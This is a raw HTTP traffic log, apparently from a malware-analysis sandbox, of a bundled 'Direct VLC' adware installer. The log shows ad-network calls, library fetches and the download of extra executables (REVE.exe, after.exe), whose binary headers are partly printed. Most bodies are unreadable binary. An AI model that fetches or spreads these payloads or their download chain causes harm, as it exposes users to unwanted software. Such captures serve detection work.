HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/javascript; charset=UTF-8
Last-Modified: Fri, 12 Oct 2012 18:27:19 GMT
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Date: Fri, 02 Oct 2015 13:38:27 GMT
Expires: Fri, 02 Oct 2015 14:38:27 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 51558
X-XSS-Protection: 1; mode=block
Cache-Control: public, must-revalidate, proxy-revalidate, max-age=3600
Age: 782
............iw...0....d...-.@......."...x{,y.<....n.M....ZB...w...A
P...9.L,.k_n..n.{.......V..G..<........}......n.........l..Y....z3.
.................E1.-.uz..........ZXI..rZm....../[email protected].....
.yUlB..U#..L...1p.>...2...].....M(...J.....e..I......5...9...e.....
&.........W..y...f./..j..}^....r...n.._7.j.o..v.i./a.7uq......r.%.,...
...j9..Y.s......@..$...... \...H...=....?....y...}W..b].G..|-....wG.N.
O<.H.Q...'w......H.....*.....?..Uo..n..Z=..U...I...*..,[email protected]...
..l.[@E1.....jq<..V.d.=.n......,..o... .gY.G....N%$f..u..."J.....xv
rR..$.q..i....l..m7....p...]./!.......JF0..^.. ...Q.....H..q...._wr"9.
.S].I/_.....~M...Z..U5..^q.z..U...k..........Q.........v...[.v..`:UJvI
o^-...........n.;..{o....p.CliS-J..w27...F.....v .{...t..........g._._
...~z......wz.......gP.K.....W....w/.ym......B.cH....?~..~/.~..../....
_.........4..s........x..z|...^|.../.._..?.z..............?.......?=..
....N......_<...3.n..I/..../ e.Rd../U...|...O.....Pi.~.....=.5..%~z
...oh..?.._~J.?.?.....0....g.. ....0....W...x....W.k|)....h....n...7Y.
...c..l.Y..._...3.D.f.,n..G?.'h...*.l...ZN...R...q..F.;.*/f6T.q-3.....
...Z.n..y\&.].......*.C..p..I.U.Z/....`..W..k<.Pn]....OtJR...P...j.
n...z]W''..z.o.b.....m...K...u.)..%.v{.8p9..T....4U......X..U.o'...T..
...D...G.tc.3o....8./.a.NK^...........q?I.0.....)-..m.\[email protected]......
\..{.>........D..n..Gp..)R:...>.D ....d.nV.......C....pWe.?Xl.B.
....6} .Q.4...j....^.6q..3..>5w\.....'.@....&6...?ok..$.;....[...!V
o........vx}{s.L.dA...6......8.r......bt.>"a........0...I~;....
<<< skipped >>>

GET /ajax/libs/jqueryui/1.8/themes/start/images/ui-bg_gloss-wave_75_2191c0_500x100.png HTTP/1.1


Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=2&distid=30060&leadp=29271&countryid=262&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ajax.googleapis.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Fri, 12 Oct 2012 18:27:19 GMT
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Date: Fri, 02 Oct 2015 13:37:57 GMT
Expires: Fri, 02 Oct 2015 14:37:57 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 3457
X-XSS-Protection: 1; mode=block
Cache-Control: public, must-revalidate, proxy-revalidate, max-age=3600
Age: 813
.PNG........IHDR.......d.....p..}...HIDATx...K..N................q..B.
...6...._.d.c.......*...V......|U.......w-...p..>Z..........`......
......`............`............`............`............`...........
.`............`.......@.....:n.K>.u.....X..V..G........l.9......j6.
x..xu..y...I... gZ.D.L...........4[OG.8.|d.....;.N[O..lz.M....{..ne.Z1
..VlO...e..k.g.........k.6.r..........be'`t#..zu39.|[..6=9....4..H."..
.-Cd.D.z.3c.g...S.,..D7.h.H=O.F6.{7.....H6G...S.......U.9.%w....`C....
.y.G^@......O..........0.l.....0.Z.4..H..[.k..Z..Z..zm].v.......J.$ZMZ
..yK.....Z.4.Z.Z.Z.Gr..M..j.b..Z^.1c.E........,....6&.9....3)....[W.vH
...a...k~....,.........1..k.R..........iWd....M.V..O)..?y.....W...._&l
t;....p.p....`............`..b.......:............:.............Xj)...
w.....-?M.bE|[...I.eki......&.U.6.........l4.[..N.F.....|...qc.Zj.7...
..;.f/..w..=......}L[...k.E.S/.x....3-...^.R....."Z.........[........:
.;...n.Z..~.....;.....%w....P7...'R^....E[?.C...X.$.^Y.Yj...}...iS.O..
...m........r%..4yy.r..I.....Io...'i..;..._....K.7.%.Q../.\......X....
3;_........[...[..ti.........._.-..Z.l;j)e.L.lyf"Dm..^4...-.|G.E VdRD.
.M....S[.{.i6G...~/7V.h....M..;^.1~.}.;......=9.]S2....y.w|Y.#s(..X..;
....:=....Y_#.\r......RkY.$.e.mk..n.E|..m|....kk...O.......'......-..n
.z..XZ}m\H.._e.....V.x9........!.../.xs......f.......5.Zl .......x....
.].?/..9r......h...]^}M....<....;..........p.p....`........}.....n.
.~....4............. ^=..kc...|j..4{u[.......H.2...Y1......R..|x.5M...
...j..4.%..x......!ij....bXcT..^[$=V.4<m^.=~..Yo.E..s..>....
<<< skipped >>>


GET /scripts/1/adnl.min.js HTTP/1.1
Accept: */*
Referer: hXXp://n20.adshostnet.com/ads?v=1&key=6c2c19aff050b202bf7c7970cb59cde3&ch=&click=&tz=3&t=1443793908504&requestRef=http://installer.ppdownload.com/installer/thankyou?productid=29271&pubid=935&distid=30060&countryid=262&reqid=345346313&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&flashVer=11.6 r602&epom_width=1200&epom_height=1400&scrWidth=1276&scrHeight=846
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn.castplatform.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Fri, 02 Oct 2015 13:51:40 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 58113
Connection: keep-alive
Vary: Accept-Encoding
Content-MD5: RYH3vmcfva6ugf JgupnqA==
Last-Modified: Thu, 01 Oct 2015 12:13:59 GMT
ETag: 0x8D2CA59C943063C
X-Node: cdn2
Server: NetDNA-cache/2.2
X-Cache: HIT
// CAST Delivery Agent v4.4.17 #12:13.!function(global,undefined){Arra
y.prototype.indexOf||(Array.prototype.indexOf=function(e,t){if(this===
undefined||null===this)throw new TypeError('"this" is null or not defi
ned');var n=this.length>>>0;for(t= t||0,1/0===Math.abs(t)&&(t
=0),0>t&&(t =n,0>t&&(t=0));n>t;t  )if(this[t]===e)return t;re
turn-1}),"object"!=typeof window.JSON&&(window.JSON={},window.JSON.str
ingify=function(e){if("[object Array]"===Object.prototype.toString.cal
l(e)){if(e.length>0){for(var t=e.length,n=[],a=0;t>a;  a)n.push(
this.stringify(e[a]));return"[" n.join(", ") "]"}return"[]"}if("object
"==typeof e&&null!==e){var n=[];for(a in e)n.push('"' a '": ' this.str
ingify(e[a]));return"{" n.join(", ") "}"}return"string"==typeof e?'"' 
e '"':e},window.JSON.parse=function(text,reviver){function walk(e,t){v
ar n,a,i=e[t];if(i&&"object"==typeof i)for(n in i)Object.prototype.has
OwnProperty.call(i,n)&&(a=walk(i,n),a!==undefined?i[n]=a:delete i[n]);
return reviver.call(e,t,i)}var cx=/[\u0000\u00ad\u0600-\u0604\u070f\u1
7b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g
,j;if(text=String(text),cx.lastIndex=0,cx.test(text)&&(text=text.repla
ce(cx,function(e){return"\\u" ("0000" e.charCodeAt(0).toString(16)).sl
ice(-4)})),/^[\],:{}\s]*$/.test(text.replace(/\\(?:["\\\/bfnrt]|u[0-9a
-fA-F]{4})/g,"@").replace(/"[^"\\\n\r]*"|true|false|null|-?\d (?:\.\d*
)?(?:[eE][ \-]?\d )?/g,"]").replace(/(?:^|:|,)(?:\s*\[) /g,"")))return
 j=eval("(" text ")"),"function"==typeof reviver?walk({"":j},""):j
<<< skipped >>>

GET /images/f4a270d9-5612-43bd-b9bc-5d0e41fded55.gif HTTP/1.1


Accept: */*
Referer: hXXp://n20.adshostnet.com/ads?v=1&key=6c2c19aff050b202bf7c7970cb59cde3&ch=&click=&tz=3&t=1443793908504&requestRef=http://installer.ppdownload.com/installer/thankyou?productid=29271&pubid=935&distid=30060&countryid=262&reqid=345346313&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&flashVer=11.6 r602&epom_width=1200&epom_height=1400&scrWidth=1276&scrHeight=846
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn.castplatform.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Fri, 02 Oct 2015 13:51:40 GMT
Content-Type: image/gif; charset=utf-8
Content-Length: 30037
Connection: keep-alive
Vary: Accept-Encoding
Content-MD5: 3M2oG790CsdIAsId8DQQMA==
Last-Modified: Sat, 07 Mar 2015 14:03:19 GMT
ETag: 0x8D226F69971EFE8
X-Node: cdn2
Server: NetDNA-cache/2.2
X-Cache: HIT
GIF89a [email protected].
h.i...Nm.......................................................Fv.....
.....Gv.............Dr..UV....dg...............Hx.....................
..69...............Vt..X[Fs....Gq..........%...*-............Mz..&).^`
....moEr.Et..........ZYY......Ku...................ihh................
.....TM.Ix.?6...................Es.VVV......ga.Ix....ws.nnn......Dr.Hx
.Ds.ppp...Dr.............Iy..............gi.....................Er....
..........................................Ds..........................
.................................................................Jy...
..........Er...........................................Hx.Es.zzz......
...Gu.........1Hy..........Fs....Hy...................................
...........!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="..." i
d="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta
/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02    
    "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-synt
ax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.ad
obe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/Re
sourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDoc
umentID="xmp.did:4e6456f5-f753-ba47-8775-8060f74ab4b5" xmpMM:DocumentI
D="xmp.did:24B47D3DC34B11E48926F06E7E11B4AF" xmpMM:InstanceID="xmp.iid
:24B47D3CC34B11E48926F06E7E11B4AF" xmp:CreatorTool="Adobe Photoshop CC
 2014 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.i
<<< skipped >>>


GET /ajax/libs/jquery/1.5/jquery.min.js HTTP/1.1
Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=2&distid=30060&leadp=29271&countryid=262&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ajax.googleapis.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/javascript; charset=UTF-8
Last-Modified: Mon, 02 Apr 2012 18:24:28 GMT
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Date: Fri, 02 Oct 2015 13:28:23 GMT
Expires: Fri, 02 Oct 2015 14:28:23 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 29947
X-XSS-Protection: 1; mode=block
Cache-Control: public, must-revalidate, proxy-revalidate, max-age=3600
Age: 1386
...............F....>..R..1.d...j0!^[email protected]........
....@0.....$..}9[.......O....f.O.......6......6...W.?..!.t............
C...r....'.}.Y..J5.....?g.|...n.Ec...j.....Q.m..Y..w...m..?}...l.....3
.o.>mp..t.g..w.tq;.v...o.-..l...q.lg:z..w..W....zM.....d.9[d.IOU...
.T#^....;..1..,..o.o.m.......g...}.m5.._u........*ES~.....5.....m.....
.v..%_..w......Z..w.6Y.E.....l......gw.C....l...a..X.:F...o&...a...z.D
#...Zq.{...x..V.wk.K..O^..(i.......f.SR/io...c..=.,.^x..*...~..4...:.{
=n(J.z(..t(.q..i.p...Y.N.tD..J.=........vXn.K..e.-xH..i..F.1..f.....e.
o?..\ew....>~...c2........z..............Gj.zB.;:....2..M.sF.s../..
*8..o....x.;....>& n.... [email protected]/.h...?U.....=T.
EE.N.i..DMU.e.E....j..Q6...B-.J....>M....:.MZ-.4.Z..._..i.%..m..]..
........o.........~.......3...HN..t.................E/[....-..vq..y...
.-....j......0.xO..U4W..&Jx.ktt.<..u.6oNK..x..h....p.Oh.......P...6
...R.C..\.n..m..?..W....6..G.....hn..h.o......!.ep6...T..N..$.......5.
)P...3.V......_.O...5..gl.5........c......6.m...^..b...c.y.r..$.....L.
.p...o.................(,uB..T.2_28....d..us.f1.L..=..&..bV..m<..=.
.......3D..\.Y..r3....A_.Y.G.%.....7|.$t.Z.k..C..\.8?.h...q....naF.i-.
......B..`6t.._..h12n....v..".pq..C.h.......x...N.L...p..............f
`[email protected].]  h........v..(i....|mv....7.......t......j..j...c.K
2...;.4.$;Ve...-o4.~.;..h.M...(*N....m0T.G]5.......K`#.&..Z.V...3.....
.m2.Z.hJ;..F...`Q.QM.?.,..E........@......=.b.........._.Fi.h6........
l....2.}$...>.=.N.M)....$eP..]..p%M....|.e......&jJ...x.u...:..
<<< skipped >>>

GET /ajax/libs/jqueryui/1.8/themes/start/images/ui-bg_inset-hard_100_fcfdfd_1x100.png HTTP/1.1


Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=2&distid=30060&leadp=29271&countryid=262&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ajax.googleapis.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Fri, 12 Oct 2012 18:27:19 GMT
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Date: Fri, 02 Oct 2015 13:49:05 GMT
Expires: Fri, 02 Oct 2015 14:49:05 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 88
X-XSS-Protection: 1; mode=block
Cache-Control: public, must-revalidate, proxy-revalidate, max-age=3600
Age: 145
.PNG........IHDR.......d.....G,Z`....IDAT..c.....&.....G0..ed.......w.
..........IEND.B`.HTTP/1.1 200 OK..Content-Type: image/png..Last-Modif
ied: Fri, 12 Oct 2012 18:27:19 GMT..Access-Control-Allow-Origin: *..Ti
ming-Allow-Origin: *..Date: Fri, 02 Oct 2015 13:49:05 GMT..Expires: Fr
i, 02 Oct 2015 14:49:05 GMT..X-Content-Type-Options: nosniff..Server: 
sffe..Content-Length: 88..X-XSS-Protection: 1; mode=block..Cache-Contr
ol: public, must-revalidate, proxy-revalidate, max-age=3600..Age: 145.
..PNG........IHDR.......d.....G,Z`....IDAT..c.....&.....G0..ed.......w
...........IEND.B`...



GET /Files//Setup_product_29271.exe HTTP/1.1
Host: dl.revenyouapp.com
Connection: Keep-Alive


HTTP/1.1 302 Redirect
Date: Fri, 02 Oct 2015 13:51:29 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 141
Connection: keep-alive
Location: hXXp://VVV.mixi.dj
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
Expires: Fri, 09 Oct 2015 13:51:29 GMT
Cache-Control: max-age=604800
X-Cache: MISS
<head><title>Document Moved</title></head>.<
;body><h1>Object Moved</h1>This document may be found &
lt;a HREF="hXXp://VVV.mixi.dj">here</a></body>HTTP/1.1 
302 Redirect..Date: Fri, 02 Oct 2015 13:51:29 GMT..Content-Type: text/
html; charset=UTF-8..Content-Length: 141..Connection: keep-alive..Loca
tion: hXXp://VVV.mixi.dj..X-Powered-By: ASP.NET..Server: NetDNA-cache/
2.2..Expires: Fri, 09 Oct 2015 13:51:29 GMT..Cache-Control: max-age=60
4800..X-Cache: MISS..<head><title>Document Moved</title
></head>.<body><h1>Object Moved</h1>This do
cument may be found <a HREF="hXXp://VVV.mixi.dj">here</a>&
lt;/body>..



GET /impression.gif?b=124&p=11&ch=&ap=&cps=&c=16&l=UA&h=7c519754f8e3f76868ca435311c83dda&t=1443793900001&s=ebee196bad2a39aaaedb5f82bf096818&tz=3.0&sh=846&sw=1276 HTTP/1.1
Accept: */*
Referer: hXXp://n20.adshostnet.com/ads?v=1&key=6c2c19aff050b202bf7c7970cb59cde3&ch=&click=&tz=3&t=1443793908504&requestRef=http://installer.ppdownload.com/installer/thankyou?productid=29271&pubid=935&distid=30060&countryid=262&reqid=345346313&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&flashVer=11.6 r602&epom_width=1200&epom_height=1400&scrWidth=1276&scrHeight=846
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: n20adshostnet.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="CAO PSA OUR"
Set-Cookie: epomUUID=b570f0f0-690c-11e5-aedb-f8bc12538c80; Domain=.n20adshostnet.com; Expires=Thu, 27-Sep-2035 13:51:40 GMT; Path=/
Set-Cookie: ucv=16-UA-1443880300927-24--; Domain=.n20adshostnet.com; Expires=Sat, 01-Oct-2016 13:51:40 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"49-1424190054000"
Last-Modified: Tue, 17 Feb 2015 16:20:54 GMT
Content-Type: image/gif
Content-Length: 49
Date: Fri, 02 Oct 2015 13:51:40 GMT
GIF89a...................!.......,...........T..;HTTP/1.1 200 OK..Serv
er: Apache-Coyote/1.1..Cache-Control: no-c..



GET /dl/0904ca6b-9076-4741-93df-df1abcd51616 HTTP/1.1
Accept: */*
Cookie: PHPSESSID=0dcbff763f102df88e7e08beb340e927
User-Agent: Setup Factory 8.0
Host: am4-r1f9-stor08.uploaded.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Oct 2015 13:51:22 GMT
Content-Type: application/octet-stream
Content-Length: 41009
Last-Modified: Fri, 25 Sep 2015 17:15:03 GMT
Connection: keep-alive
Content-Disposition: attachment; filename="REVE.exe"
ETag: "56058117-a031"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........y.........
............................Rich............PE..L......V..............
...`[email protected]....@.........................................
.................................[..(.......6.........................
..........................................(... .......t...............
.............text....R.......`.................. ..`.data........p....
[email protected]........ ..................@..@l.[J....
........MSVBVM60.DLL..................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>


GET /js/show_ads.js HTTP/1.1
Accept: */*
Referer: hXXp://installer.ppdownload.com/installer/ThankYouInner?productid=29271&productname=Direct VLC
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: n20.adshostnet.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=3600
Accept-Ranges: bytes
ETag: W/"10660-1442925030000"
Last-Modified: Tue, 22 Sep 2015 12:30:30 GMT
Content-Type: application/javascript
Transfer-Encoding: chunked
Content-Encoding: gzip
Vary: Accept-Encoding
Date: Fri, 02 Oct 2015 13:51:39 GMT
a..............200....ks..........H..w..RdEn.Q..d.......EH$...% ".{w..
.....v...qo....].>.:l.........4.s63?x.>Mx1......4.B.v...........
Y....RH....x.4.!K.T/.,....2.n.....'./f.du."..s.....?..1.'...<J...9.
....gG.. ....X.......)....X..O. .9.".a'.,.g..,..'.<...=.`..M...S..4
.q.G.,...D.|\0>....(....<e_.M<R.......P.l..x..:...l..u..d.1..
.\..................mV . .Q..|...iZ..n.{.P!~.9.........g..52.....9.r.n
D...U.j./g..a.%.........u)..... k...e..e...[E-8t..i...h.O0_<3,-.>
;.i..r...qv..... .n...f"H.G..."6f3.:h.Z.9{...../..x..|..: ..\..}a.....
.200.........I ^..-..u.........T.&.E...jEH...;:....}...(...!.C-e.h....
[email protected]........ lTp....Lh......z.:......}...x.....:......j...}
%.e..h..juy......'o......D..uH...........-.,..v...R.q..1....G...6Xb...
y#...p...[...{[email protected]..~w..:....a&..i...~7....&......G7..$?...8..
P...$ ...!...$.?..d.!h7,"[email protected]~....@.)O.s<...y.W.
N.F....'......._2*Q.IOf....OS.B.!...(.`.-.. .9D..i6KQ....[...U..w..o.&
gt;?.I<...A.po...#...'.$:.."!.u#.c].r..h.fu.-.|.F.6......./.....@.[
..6.p.l(.>..$".y..K.cMb...... ...<.=X..200..B%.#1p`..5dJ0...\...
=.......2...0._D<HP.h.b..!.!.&B.g_$.~]5....J.,.....X&.>."e...F.)
8.7.`.B..H$.{".....ob...{....#...f...c..5.....x.0\...q.U?.."."[..(TF.}
.K...5>Le|.XJ.^.!.u.W.....xY......<Xp......Xf....3...:.g.g7.... 
...w..J...w.d.X.A..3."\......P.C...~%. ..bx....;....c.....x)9.-..s.z..
.[...zx....%....uGb~.3=sx..A.... ..<..Y.....%....g(P..".O.......Z..
.i..z9....j....`{.6..!.H..k..v...%.....|.........M...H...e..[5....
<<< skipped >>>

GET /ads?v=1&key=6c2c19aff050b202bf7c7970cb59cde3&ch=&click=&tz=3&t=1443793908504&requestRef=http://installer.ppdownload.com/installer/thankyou?productid=29271&pubid=935&distid=30060&countryid=262&reqid=345346313&sysbit=32&dfb=0&hb=-1&isagg=1&version=6.12&external=0&flashVer=11.6 r602&epom_width=1200&epom_height=1400&scrWidth=1276&scrHeight=846 HTTP/1.1


Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://installer.ppdownload.com/installer/ThankYouInner?productid=29271&productname=Direct VLC
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: n20.adshostnet.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="CAO PSA OUR"
Set-Cookie: epomUUID=b4e37e00-690c-11e5-b8e9-002481e7ea6c; Domain=.adshostnet.com; Expires=Thu, 27-Sep-2035 13:51:40 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Content-Encoding: gzip
Vary: Accept-Encoding
Date: Fri, 02 Oct 2015 13:51:39 GMT
a..............200...V{S.J.........$\$!.D t.l.^....i.a...D.n..h......T
,.......y?.^(.q..R..{. .....n../..I.D".J.gH.]:W...\._..).fB......F.k."
o...'....~.......D.1"#.,.NfW...m.!..*...f.8.O-.]...'..}.......|q...Q`.
 x.C<...`...6T..e.c.."X{ji.R...`.......hg.rFSSE......b....U6A...0..
.0.....B..#.;.N..R.yp.J<:..iJ...)..Q!..!#c>."F}C....c1.....L.GW.
h........gA4.E.;.3.N..u6..Jp....._s.........2...T^6......`.Hs.)....bdY
..7.T.&.....D...h..1<... .&...ZEIy..Y.....zN>Z0yN>.3..PL....&
lt;b.Y5....)'o"_....F.Pj....B.a.....Y!<.iG...<.]..;..V.."5...Gs.
.200...A..i.5..........xF(e.q..v..R....f ..<[email protected][./
<C..vF...;8U.~t.H......x..3. .Zk..F......y...^.%0....../..P.;.Dh...
.!gBb&.]d.........tx<8;S....e....h<.tz.H.!>....:O..Z../..W...
.x0y{r.A....e.g...F.....hr...V=....z}.X.3."...Z..U..5Bi....Y~..*.J....
6Ia..a...2.......k...t.[_8...`/#f_.c-*.|....k..S.6*.V.<..%l.5Bf..zi
.$....Q.[B.sW.|N2%.....$<.......M..P..N..d.>....~A...E#:N...p4..
.w.4.....T.n.F[A........=.lTk....5B.DE..$T. V2.<...J.V{..UT...u.4.x
...=..f.*0..fQ7...8".......F.KUMx.w.;..,.7i$.e<..T._l.n..ed....`.e 
...6...K. G.GS...1...';9.. .9.A.p.q...Xa.]...P.s....v..........b...-.k
R.o..r.N`.p".....E@@..(x3..w......E.zE.xE..........i....Uw.....M..^..j
...7..K.u..E...F}o.._.?.(<:...o.._..}.1.g..]....V.m....nW."...VQ..?
{-..........?...E.r.......0..
<<< skipped >>>


GET /dc.js HTTP/1.1
Accept: */*
Referer: hXXp://srv.serverdatasrv.com//offers/DynamicOfferScreen?offerid=5&distid=30060&leadp=29271&countryid=262&sysbit=32&imgurl=&dfb=0&hb=-1&isagg=1&version=6.12&external=0&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: stats.g.doubleclick.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Strict-Transport-Security: max-age=10886400
Date: Fri, 02 Oct 2015 12:06:43 GMT
Expires: Fri, 02 Oct 2015 14:06:43 GMT
Last-Modified: Thu, 10 Sep 2015 10:52:20 GMT
X-Content-Type-Options: nosniff
Content-Type: text/javascript
Vary: Accept-Encoding
Content-Encoding: gzip
Server: Golfe2
Content-Length: 15977
Age: 6282
Cache-Control: public, max-age=7200
...........}kW....w~........pk..f......Z.R..Y.C 8i.pi......b..}.>g.
.Kl...}4....d....O...-.....`~...E...]7..>..>....Pf.a.yU."HCC...i
...T*..b.....'..Olf[.Y.[c6P/.....'n.m'..m.... !_XXll..&..(..E..V=/.u.X
..%.w...i..rDoT.....?>z..1`.D...y...y7. \...5ZI...TA..........C...p
3..A..x.k.q4.2...?L.k=.v....4.:sB[...l.w.o {.....?Nc....|..........q..
.......[.n..2..X~.......S.f.]h~....7:.n...m.C#6...........#....y...7.|
..f.W.>..wS......)..Q....i......z......D.`...7N....y.C;....`1....x.
.p.tG.L..=..1r...M..2..)xa...{0!..5...^...7..."..........J8... ...5.O.
...l...r...|....R...P.0ok.8.Z.2....i|...S.y.od...~..k.>.....0vGr.mI
.....0.&&yg.sf2......m.....G=0..B.6..u....A.h.A.0.V.:.-...j..L.....5.E
.[...Q.{2imA......T........~. ...0*%.....>......hX...ga1./$......f.
#..d,.|www5/XX...c5..D-.....p.h..8D.@./.X,.....&gTV..5..,.x..?.....(.&
gt;?6Sy.].`.]...'-"....-...........(.n.@_"p"`.*...T.1.$..t.....o?.."..
/.kX.)[email protected].,HP........# ....d...-,.......-.j..B
S....9...%.~Sug,...`."[email protected]]..yn.i(5.....U.r..$j..0{|.i.5........
H}.......A=..&.Vq....4<..*7c.<b.....OQ8X...&..a/a.....aI.j.7.E.:
cuV=.P.q..d.....X....#[email protected][email protected].#....Q.....K.....
.A.y._....z|..9...9.zM......%m........m).?4.Q...c.....PTDB&..7.-G....E
.....E.7.t.V..G....._..!.....xt..}.......Ev..x..a.{...d.. .q./..OB|.
.6..{....a^.......@?.......o.....*T.;/Oa.......J..........I.)......J..
#..A....FS.....t.H..h...W..|B.~..t.6..........t"<..z..||.......8..B
9......x.a....m.V[.=...K!..\.....w."d...=>.B..(K...u.....~.".@b
<<< skipped >>>


GET /dl/eab67468-b301-4ba1-bc6a-21c9013f0cb1 HTTP/1.1
Accept: */*
Host: fra-7m19-stor01.uploaded.net
User-Agent: Setup Factory 8.0
Cookie: PHPSESSID=0dcbff763f102df88e7e08beb340e927
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Oct 2015 13:51:18 GMT
Content-Type: application/octet-stream
Content-Length: 1850128
Last-Modified: Fri, 25 Sep 2015 17:43:22 GMT
Connection: keep-alive
Content-Disposition: attachment; filename="after.exe"
ETag: "560587ba-1c3b10"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........2...\...\.
..\..'....\..'....\.......\...]...\..'....\..'....\..'....\.Rich..\...
......PE..L...,-.T.................X...........).......p....@.........
........................J6....@.................................<..
.d....................................................................
...@............p..x............................text....W.......X.....
............. ..`.rdata.......p...0...\..............@[email protected]....
[email protected]...............................@[email protected]
[email protected].................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U...X......... [email protected].
SVW.}[email protected]@.P..hq@........`........V......SP.......Pp@..
..W..;.}[email protected][email protected]...
@..4.......P...p@......./ub......<Tt"<Wt.<tt.<wuL......P..
...u>.......6......P.....~(......:u....~....P......P......P........
